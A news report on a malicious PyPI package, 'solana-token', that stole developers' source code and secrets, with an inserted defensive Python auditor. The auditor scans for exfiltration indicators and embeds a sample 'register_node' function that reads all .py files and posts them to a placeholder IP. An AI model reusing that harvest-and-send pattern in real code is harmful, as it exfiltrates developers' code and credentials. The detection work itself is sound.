Cybersecurity researchers have discovered a malicious package on the Python Package Index (PyPI) that poses as a helper library for the Solana blockchain but contains functionality to steal source code and developer secrets.
The package, named solana-token, is no longer available for download from PyPI, but not before it had been downloaded 761 times. It was first published to PyPI in early April 2024, albeit under a completely different version numbering.
“Upon installation, the malicious package attempts to exfiltrate source code and developer secrets from the developer's machine to a hard-coded IP address,” ReversingLabs researcher Karlo Zanki said in a report shared with The Hacker News.
Specifically, the package is designed to copy and exfiltrate the source code contained in all files in the Python stack under the guise of a blockchain function called "register_node()".
Such unusual behaviour suggests that the attackers are seeking to exfiltrate crypto-related sensitive secrets that may be hard-coded in the early stages of writing a program that incorporates the malicious function.
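The combination described above (harvesting source files, a hard-coded IP address, a network send) can be checked for statically before a package is installed. The audit below is an added defender-side illustration, not the article's or ReversingLabs' tooling; it parses a module with Python's ast module and flags that combination. The register_node sample it scans is constructed to mirror the described behaviour and is not the actual package's code.

```python
import ast
import re

IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
FILE_READ = {"open", "walk", "glob", "iglob", "read_text", "listdir"}
NETWORK = {"post", "put", "urlopen", "connect", "sendall", "request"}


def _call_name(node):
    """Bare function or attribute name of a call, e.g. os.walk -> 'walk'."""
    f = node.func
    if isinstance(f, ast.Attribute):
        return f.attr
    return f.id if isinstance(f, ast.Name) else ""


def audit_source(src):
    """Collect indicators from one module: hard-coded IPv4 literals,
    file-harvesting calls and network-send calls. Flag the combination."""
    found = {"ips": set(), "file_read": set(), "network": set()}
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            m = IPV4.search(node.value)
            if m:
                found["ips"].add(m.group())
        elif isinstance(node, ast.Call):
            name = _call_name(node)
            if name in FILE_READ:
                found["file_read"].add(name)
            elif name in NETWORK:
                found["network"].add(name)
    # Exfiltration needs all three: harvest, hard-coded destination, send.
    found["suspicious"] = all((found["ips"], found["file_read"], found["network"]))
    return found


# Constructed sample modelled on the behaviour described above: a "blockchain"
# helper that reads every .py file it finds and ships the contents to a
# hard-coded address (192.0.2.10 is an RFC 5737 documentation placeholder).
SUSPICIOUS = '''
import os, requests
def register_node(root="."):
    blob = ""
    for d, _, files in os.walk(root):
        for f in files:
            if f.endswith(".py"):
                blob += open(os.path.join(d, f)).read()
    requests.post("http://192.0.2.10/upload", data=blob)
'''
```

Run audit_source over each module of an unpacked sdist or wheel, with setup.py first, since that is the code that executes at install time; a module that only reads files, or only talks to the network, is not flagged.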
Developers seeking to create their own blockchains are believed to be the likely targets of the threat actors, an assessment based on the package's name and the functions built into it.
The exact method by which the package may have been distributed to users is currently unknown, although it was likely promoted on developer-focused platforms.
If anything, the discovery underscores that cryptocurrency remains one of the most popular targets for supply chain threat actors, making it necessary for developers to take steps to scrutinize every package before using it.
“Development teams should aggressively monitor for suspicious activity or unexplained changes in both open source and commercial third-party software modules,” Zanki said. “By stopping malicious code before it is allowed to penetrate secure development environments, teams can prevent crippling supply chain attacks.”